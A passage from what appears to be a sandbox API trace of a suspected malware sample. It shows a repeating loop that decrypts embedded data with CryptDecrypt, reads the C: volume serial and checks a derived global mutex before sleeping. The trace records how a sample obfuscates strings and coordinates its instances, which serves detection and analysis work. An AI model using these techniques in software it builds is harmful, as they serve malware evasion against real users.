pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0151.348] CryptDestroyKey (hKey=0x29c020) returned 1 [0151.348] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0151.348] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0151.348] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0151.348] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0151.349] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0151.349] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0151.349] CryptDestroyKey (hKey=0x29c020) returned 1 [0151.349] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0151.349] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0151.349] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0151.349] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0151.349] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0151.349] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0151.349] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0151.349] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0151.349] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0151.349] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0151.349] CryptDestroyKey (hKey=0x29c020) returned 1 [0151.349] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0151.349] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0151.349] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0151.349] CloseHandle (hObject=0x1c0) returned 1 [0151.349] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0151.349] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0151.349] Sleep (dwMilliseconds=0x3e8) [0153.407] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0153.407] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0153.407] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0153.407] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0153.408] CryptDestroyKey (hKey=0x29c020) returned 1 [0153.408] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0153.408] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0153.408] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0153.408] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0153.408] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0153.408] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0153.408] CryptDestroyKey (hKey=0x29c020) returned 1 [0153.408] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0153.408] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0153.408] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0153.408] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0153.408] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.408] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0153.408] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0153.408] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0153.408] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0153.408] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0153.408] CryptDestroyKey (hKey=0x29c020) returned 1 [0153.408] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0153.408] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0153.408] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0153.408] CloseHandle (hObject=0x1c0) returned 1 [0153.409] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0153.409] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0153.409] Sleep (dwMilliseconds=0x3e8) [0154.505] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0154.505] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0154.505] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0154.505] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0154.505] CryptDestroyKey (hKey=0x29c020) returned 1 [0154.505] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0154.505] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0154.505] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0154.505] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0154.505] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0154.505] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0154.505] CryptDestroyKey (hKey=0x29c020) returned 1 [0154.505] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0154.506] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0154.506] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0154.506] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0154.506] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0154.506] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0154.506] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0154.506] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0154.506] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0154.506] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0154.506] CryptDestroyKey (hKey=0x29c020) returned 1 [0154.506] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0154.506] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0154.506] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0154.506] CloseHandle (hObject=0x1c0) returned 1 [0154.506] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0154.506] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0154.506] Sleep (dwMilliseconds=0x3e8) [0155.510] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0155.510] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0155.510] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0155.510] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0155.510] CryptDestroyKey (hKey=0x29c020) returned 1 [0155.510] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0155.510] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0155.510] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0155.510] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0155.510] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0155.510] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0155.510] CryptDestroyKey (hKey=0x29c020) returned 1 [0155.510] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0155.510] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0155.511] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0155.511] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0155.511] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0155.511] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0155.511] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0155.511] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0155.511] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0155.511] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0155.511] CryptDestroyKey (hKey=0x29c020) returned 1 [0155.511] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0155.511] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0155.511] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0155.511] CloseHandle (hObject=0x1c0) returned 1 [0155.511] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0155.511] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0155.511] Sleep (dwMilliseconds=0x3e8) [0156.524] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0156.524] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0156.524] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0156.524] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0156.524] CryptDestroyKey (hKey=0x29c020) returned 1 [0156.524] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0156.524] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0156.524] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0156.524] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0156.524] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0156.524] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0156.524] CryptDestroyKey (hKey=0x29c020) returned 1 [0156.525] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0156.525] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0156.525] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0156.525] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0156.525] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0156.525] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0156.525] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0156.525] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0156.525] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0156.525] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0156.525] CryptDestroyKey (hKey=0x29c020) returned 1 [0156.525] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0156.525] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0156.525] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0156.525] CloseHandle (hObject=0x1c0) returned 1 [0156.525] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0156.525] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0156.525] Sleep (dwMilliseconds=0x3e8) [0157.627] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0157.627] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0157.627] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0157.627] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0157.627] CryptDestroyKey (hKey=0x29c020) returned 1 [0157.627] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0157.627] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0157.627] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0157.627] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0157.627] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0157.627] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0157.627] CryptDestroyKey (hKey=0x29c020) returned 1 [0157.627] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0157.627] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0157.627] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0157.627] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0157.627] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0157.627] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0157.627] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0157.627] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0157.627] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0157.627] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0157.627] CryptDestroyKey (hKey=0x29c020) returned 1 [0157.627] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0157.628] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0157.628] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0157.628] CloseHandle (hObject=0x1c0) returned 1 [0157.628] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0157.628] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0157.628] Sleep (dwMilliseconds=0x3e8) [0158.704] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0158.704] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0158.705] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0158.705] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0158.705] CryptDestroyKey (hKey=0x29c020) returned 1 [0158.705] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0158.705] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0158.705] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0158.705] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0158.705] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0158.705] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0158.705] CryptDestroyKey (hKey=0x29c020) returned 1 [0158.705] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0158.705] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0158.705] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0158.705] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0158.705] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0158.705] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0158.705] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0158.705] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0158.705] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0158.706] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0158.706] CryptDestroyKey (hKey=0x29c020) returned 1 [0158.706] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0158.706] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0158.706] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0158.706] CloseHandle (hObject=0x1c0) returned 1 [0158.706] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0158.706] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0158.706] Sleep (dwMilliseconds=0x3e8) [0159.709] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 